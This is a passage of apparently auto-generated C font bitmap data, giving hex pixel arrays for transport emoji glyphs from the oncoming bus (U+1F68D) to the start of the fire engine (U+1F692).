0x7f, 0xfe, 0x0, 0x0, 0x1e, 0xf, 0x3, 0xff,
0xf0, 0x3f, 0xff, 0xff, 0xff, 0xfe, 0x3, 0xff,
0xcf, 0xf8, 0xf, 0xff, 0xff, 0xff, 0xff, 0x1,
0xff, 0xc0, 0x1c, 0xf, 0x0, 0x0, 0x0, 0x3,
0x80, 0xe0, 0x0, 0xf, 0x7, 0x80, 0x0, 0x0,
0x1, 0xe0, 0xf0, 0x0, 0x3, 0xc7, 0x80, 0x0,
0x0, 0x0, 0x78, 0xf0, 0x0, 0x1, 0xff, 0xc0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x7f,
0xc0, 0x0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0x0,
0xf, 0x80, 0x0, 0x0, 0x0, 0x1, 0xf0, 0x0,
0x0,
/* U+1F68D "🚍" */
0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x0, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0, 0x78,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0xe, 0x1, 0xff, 0xff, 0xff, 0xff,
0x80, 0x70, 0x0, 0x1c, 0x7, 0xff, 0xff, 0xff,
0xff, 0xc0, 0xe0, 0x0, 0x38, 0x1f, 0xff, 0xff,
0xff, 0xff, 0x81, 0xc0, 0x3, 0xf0, 0x3f, 0xff,
0xff, 0xff, 0xff, 0x3, 0x80, 0xf, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x39, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0, 0x63,
0x83, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x1c, 0x1,
0xc7, 0x7, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x38,
0x7, 0xce, 0xe, 0x0, 0xe0, 0x7, 0x0, 0x38,
0x70, 0xf, 0x9c, 0x1c, 0x1, 0xc0, 0xe, 0x0,
0x70, 0xe0, 0x1f, 0x38, 0x38, 0x3, 0x80, 0x1c,
0x0, 0xe1, 0xc0, 0x3e, 0x70, 0x70, 0x7, 0x0,
0x38, 0x1, 0xc3, 0x80, 0x7c, 0xe0, 0xe0, 0xe,
0x0, 0x70, 0x3, 0x87, 0x0, 0xf9, 0xc1, 0xc0,
0x1c, 0x0, 0xe0, 0x7, 0xe, 0x1, 0xf3, 0x83,
0x80, 0x38, 0x1, 0xc0, 0xe, 0x1c, 0x1, 0xc7,
0x7, 0x0, 0x70, 0x3, 0x80, 0x1c, 0x38, 0x70,
0xe, 0xe, 0x0, 0xe0, 0x7, 0x1e, 0x38, 0x71,
0xf0, 0x1c, 0x1c, 0x1, 0xc0, 0xe, 0x3c, 0x70,
0xe3, 0xe0, 0x38, 0x38, 0x3, 0x80, 0x1c, 0x78,
0xe1, 0xc7, 0xc0, 0x70, 0x70, 0x7, 0x0, 0x38,
0xf1, 0xc3, 0x8f, 0x80, 0xe0, 0xe0, 0xe, 0x0,
0x7f, 0xff, 0x87, 0x1f, 0x1, 0xc1, 0xc0, 0x1c,
0x0, 0xff, 0xff, 0xe, 0x3e, 0x3, 0x83, 0x80,
0x38, 0x1, 0xff, 0xfe, 0x1c, 0x7c, 0x7, 0x7,
0x0, 0x70, 0x3, 0xff, 0xfc, 0x38, 0xf8, 0xe,
0xf, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x70, 0xe0,
0x1c, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xf0, 0xe1,
0x80, 0x38, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xc1,
0xc7, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xfc, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xe0, 0x1, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0xfe, 0x0, 0x3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x0, 0x7, 0x1, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x38, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x71, 0xc3, 0x80, 0x0, 0x0, 0x70, 0xe3,
0x80, 0x0, 0xe7, 0xcf, 0x80, 0x0, 0x0, 0xf1,
0xe7, 0x0, 0x1, 0xcf, 0x9f, 0x0, 0x0, 0x3,
0xe3, 0xce, 0x0, 0x3, 0x9f, 0x3e, 0x0, 0x0,
0x3, 0xc7, 0x9c, 0x0, 0x7, 0x0, 0x38, 0x0,
0x0, 0x7, 0x0, 0x38, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0xf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0x0, 0xf, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x3, 0xfe,
0x0, 0x0, 0x0, 0x7, 0xfc, 0x0, 0x0, 0x3,
0xfc, 0x0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0x0,
0x7, 0xf8, 0x0, 0x0, 0x0, 0x1f, 0xe0, 0x0,
0x0, 0x7, 0xf0, 0x0, 0x0, 0x0, 0x3f, 0x80,
0x0,
/* U+1F68E "🚎" */
0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x7,
0xff, 0xfc, 0x0, 0x0, 0x0, 0x7, 0xff, 0x1,
0xff, 0xff, 0x0, 0x0, 0x0, 0x3, 0xf8, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x1, 0xe0, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xfe, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x3f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xdf, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1f,
0xe0, 0xe, 0x0, 0xe0, 0x7, 0x0, 0x7f, 0xc7,
0xf0, 0x3, 0x80, 0x38, 0x1, 0xc0, 0x1f, 0xf1,
0xfc, 0x0, 0xe0, 0xe, 0x0, 0x70, 0x7, 0xfc,
0x7f, 0x0, 0x38, 0x3, 0x80, 0x1c, 0x1, 0xff,
0x1f, 0xc0, 0xe, 0x0, 0xe0, 0x7, 0x0, 0x7f,
0xc7, 0xe0, 0x3, 0x80, 0x38, 0x1, 0xc0, 0x1f,
0xf1, 0xf8, 0x0, 0xe0, 0xe, 0x0, 0x70, 0x7,
0xfc, 0xfe, 0x0, 0x38, 0x3, 0x80, 0x1c, 0x1,
0xfc, 0x3f, 0x80, 0xe, 0x0, 0xe0, 0x7, 0x0,
0x7f, 0xf, 0xe0, 0x3, 0x80, 0x38, 0x1, 0xc0,
0x1f, 0xc3, 0xf8, 0x0, 0xe0, 0xe, 0x0, 0x70,
0x7, 0xf0, 0xff, 0x1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf, 0xff, 0xfe, 0x0, 0x0, 0x0,
0x0, 0x1, 0xc3, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x70, 0x0, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0x1c, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc7, 0x0, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf1, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x7f, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x18, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xc6, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x71, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xce, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x7, 0xc0, 0x73, 0x83, 0xfc,
0x0, 0x0, 0x0, 0x7, 0xf8, 0x1c, 0xe1, 0xff,
0x80, 0x0, 0x0, 0x3, 0xff, 0x7, 0x38, 0xf0,
0xe0, 0x0, 0x0, 0x0, 0xe3, 0xc1, 0xce, 0x38,
0x1c, 0x0, 0x0, 0x0, 0x30, 0x78, 0x71, 0xfe,
0x7, 0xff, 0xff, 0xff, 0xfc, 0xf, 0xf8, 0x3f,
0x81, 0xff, 0xff, 0xff, 0xff, 0x3, 0xfc, 0x0,
0xe0, 0x70, 0x0, 0x0, 0x0, 0xc1, 0xe0, 0x0,
0x1c, 0x38, 0x0, 0x0, 0x0, 0x38, 0xf0, 0x0,
0x7, 0xfe, 0x0, 0x0, 0x0, 0xf, 0xfc, 0x0,
0x0, 0xff, 0x0, 0x0, 0x0, 0x1, 0xfe, 0x0,
0x0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0,
/* U+1F68F "🚏" */
0x0, 0x0, 0x0, 0x7c, 0x0, 0x3f, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x3f, 0xfe, 0x0, 0x0,
0x0, 0x1, 0xf0, 0xf, 0x81, 0xf0, 0x7f, 0xff,
0xfc, 0x3e, 0x3, 0x80, 0xf, 0xf, 0xff, 0xff,
0x87, 0xc0, 0xe0, 0x0, 0xf1, 0xc0, 0x0, 0x30,
0xf8, 0x38, 0x0, 0xf, 0x38, 0x0, 0x6, 0x1f,
0xe, 0xf, 0xe0, 0xe7, 0x0, 0x0, 0xc3, 0xe1,
0xc7, 0xff, 0xe, 0xe0, 0x0, 0x18, 0x7c, 0x70,
0x80, 0x21, 0xdf, 0xff, 0xff, 0xf, 0x8e, 0x10,
0x4, 0x1f, 0xff, 0xff, 0xe1, 0xf1, 0xc2, 0x0,
0x83, 0xf0, 0x0, 0xf, 0xff, 0xf0, 0x60, 0x30,
0x7e, 0x0, 0x1, 0xff, 0xfe, 0xf, 0xfe, 0xf,
0xc0, 0x0, 0x3f, 0xff, 0xc1, 0x3e, 0x41, 0xff,
0xff, 0xfe, 0x1f, 0x1c, 0x23, 0x88, 0x3f, 0xff,
0xff, 0xc3, 0xe3, 0x84, 0x71, 0x7, 0xff, 0xff,
0xf8, 0x7c, 0x70, 0xff, 0xe1, 0xdc, 0x0, 0x3,
0xf, 0x87, 0x18, 0xc, 0x3b, 0x80, 0x0, 0x61,
0xf0, 0xe3, 0x1, 0x8e, 0x70, 0x0, 0xc, 0x3e,
0xe, 0x0, 0x3, 0xce, 0x0, 0x1, 0x87, 0xc0,
0xe0, 0x0, 0xf1, 0xff, 0xff, 0xf0, 0xf8, 0xe,
0x0, 0x3c, 0x3f, 0xff, 0xfe, 0x1f, 0x0, 0xf8,
0x1f, 0x0, 0x0, 0x0, 0x3, 0xe0, 0xf, 0xff,
0x80, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x3f, 0xc0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0, 0x1,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x38,
0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0xe, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x78, 0xf1,
0xc0, 0x0, 0x0, 0x0, 0x3, 0x8f, 0x1e, 0x38,
0x0, 0x0, 0x0, 0x0, 0x71, 0xe3, 0xc7, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x38, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0xe3, 0xc7, 0x8e, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x78, 0xf1, 0xc0, 0x0, 0x0, 0x0, 0x3,
0x8f, 0x1e, 0x38, 0x0, 0x0, 0x0, 0x0, 0x70,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x38, 0xf1, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x7, 0x1e, 0x3c, 0x70,
0x0, 0x0, 0x0, 0x0, 0xe3, 0xc7, 0x8e, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x3, 0x80, 0x0, 0x38, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x7, 0x0, 0x0, 0x0,
0x0, 0xf, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7c, 0x0, 0x0, 0x0, 0x0,
/* U+1F690 "🚐" */
0x0, 0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfe, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0x80, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0,
0x0, 0x18, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x78, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc,
0x0, 0x0, 0x7, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0x0, 0xe, 0x7, 0xfc,
0x7f, 0xff, 0xff, 0xc0, 0x60, 0x0, 0x0, 0xe0,
0xff, 0xc7, 0xff, 0xff, 0xfe, 0x6, 0x0, 0x0,
0x1c, 0xe, 0xc, 0x60, 0x0, 0x0, 0x60, 0x60,
0x0, 0x1, 0xc1, 0xc0, 0xc6, 0x0, 0x0, 0x6,
0x7, 0x0, 0x0, 0x38, 0x38, 0xc, 0x60, 0x0,
0x0, 0x70, 0x70, 0x0, 0x3, 0x83, 0x80, 0xc6,
0x0, 0x0, 0x7, 0x3, 0x0, 0x0, 0x70, 0x70,
0xc, 0x60, 0x0, 0x0, 0x70, 0x30, 0x0, 0x7,
0x7, 0x0, 0xc6, 0x0, 0x0, 0x3, 0x3, 0x0,
0x0, 0xe0, 0xe0, 0xc, 0x60, 0x0, 0x0, 0x30,
0x38, 0x0, 0xe, 0xe, 0x0, 0xc6, 0x0, 0x0,
0x3, 0x83, 0x80, 0x1, 0xc1, 0xc0, 0xc, 0x60,
0x0, 0x0, 0x38, 0x18, 0x0, 0x38, 0x1c, 0x0,
0xc6, 0x0, 0x0, 0x3, 0x81, 0x80, 0x3, 0x83,
0xff, 0xfc, 0x7f, 0xff, 0xff, 0xf8, 0x18, 0x3,
0xf0, 0x3f, 0xff, 0xc7, 0xff, 0xff, 0xff, 0x81,
0xc0, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xc, 0x30, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xc,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc7, 0xfc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7e, 0x7f, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xe6, 0x6, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xce, 0xe0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18, 0xee,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x86, 0xe1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x6c, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x86, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x6f, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0x86, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x18,
0x7f, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x0, 0xf,
0xff, 0xc7, 0xff, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0xf, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x1f, 0xff,
0xff, 0xc0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0x80,
0xff, 0xef, 0xf8, 0x3, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x7, 0xfe, 0x7f, 0x80, 0x3f, 0xff, 0xff,
0xff, 0xff, 0x0, 0x7f, 0x80, 0x38, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x70, 0x7, 0x0, 0x3, 0x80,
0x38, 0x0, 0x0, 0x0, 0x7, 0x0, 0x70, 0x0,
0x1c, 0x7, 0x80, 0x0, 0x0, 0x0, 0x78, 0xe,
0x0, 0x1, 0xe0, 0xf0, 0x0, 0x0, 0x0, 0x3,
0xc1, 0xe0, 0x0, 0xf, 0xff, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xfc, 0x0, 0x0, 0x7f, 0xe0, 0x0,
0x0, 0x0, 0x0, 0xff, 0x80, 0x0, 0x1, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0,
/* U+1F691 "🚑" */
0x0, 0x0, 0x0, 0x0, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x23, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x63,
0x8c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x9c, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x47, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0x80, 0x0, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x3,
0x9c, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x38, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0x1, 0xc7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x0, 0xe, 0x38, 0x0, 0x0,
0x0, 0x0, 0x3, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x1, 0xc0, 0xff,
0xf8, 0x0, 0xf, 0x0, 0x6, 0x0, 0x0, 0xe,
0xf, 0xff, 0xc0, 0x0, 0x78, 0x0, 0x38, 0x0,
0x0, 0xe0, 0xe0, 0x6, 0x0, 0x43, 0xc2, 0x1,
0xc0, 0x0, 0xf, 0xe, 0x0, 0x30, 0x7, 0x9e,
0x78, 0xe, 0x0, 0x0, 0x70, 0x70, 0x1, 0x80,
0x3f, 0xf7, 0xc0, 0x70, 0x0, 0x7, 0x7, 0x0,
0xc, 0x1, 0xff, 0xff, 0x1, 0x80, 0x0, 0x38,
0x38, 0x0, 0x60, 0x7, 0xff, 0xe0, 0xe, 0x0,
0x3, 0x83, 0x80, 0x3, 0x0, 0xf, 0xfc, 0x0,
0x70, 0x0, 0x1c, 0x3c, 0x0, 0x18, 0x0, 0x3f,
0xc0, 0x3, 0x80, 0x1, 0xc1, 0xc0, 0x0, 0xc0,
0x7, 0xff, 0x80, 0x1c, 0x0, 0x1e, 0x1e, 0x0,
0x6, 0x0, 0x7f, 0xff, 0x0, 0xe0, 0x0, 0xe0,
0xe0, 0x0, 0x30, 0xf, 0xff, 0xfc, 0x7, 0x0,
0xe, 0xf, 0xff, 0xff, 0x80, 0x3e, 0xf7, 0xc0,
0x38, 0x0, 0xf0, 0x7f, 0xff, 0xfc, 0x0, 0xc7,
0x8e, 0x1, 0xe0, 0xf, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3c, 0x0, 0x7, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x0, 0x38, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x1, 0xc1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0xf, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x70, 0xff, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x87, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x38, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe1,
0xc0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xe, 0x1, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x70, 0xf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xc3, 0x81, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0x87, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xe7, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x7f, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xfb,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x0, 0x1, 0xff,
0xff, 0xdf, 0xff, 0xff, 0xf0, 0x0, 0x0, 0x0,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x1, 0xff, 0xff, 0xf7, 0xff, 0xff, 0xff,
0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xbf, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0xff, 0xff, 0xfd,
0xff, 0xfc, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xf0,
0xff, 0xe7, 0xff, 0xc1, 0xff, 0xff, 0xff, 0xff,
0xff, 0x3, 0xfe, 0xf, 0xfc, 0x7, 0xff, 0xff,
0xff, 0xff, 0xf8, 0xf, 0xe0, 0x0, 0xe0, 0x3c,
0x0, 0x0, 0x0, 0x3, 0x80, 0x70, 0x0, 0x7,
0x1, 0xe0, 0x0, 0x0, 0x0, 0x1c, 0x3, 0x80,
0x0, 0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x1c, 0x0, 0x1, 0xe0, 0xf0, 0x0, 0x0, 0x0,
0x3, 0x81, 0xe0, 0x0, 0x7, 0x8f, 0x80, 0x0,
0x0, 0x0, 0x1e, 0x1e, 0x0, 0x0, 0x1f, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x7f, 0xe0, 0x0, 0x0,
0x7f, 0x80, 0x0, 0x0, 0x0, 0x1, 0xfe, 0x0,
0x0, 0x1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0,
/* U+1F692 "🚒" */
0x0, 0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0xff,
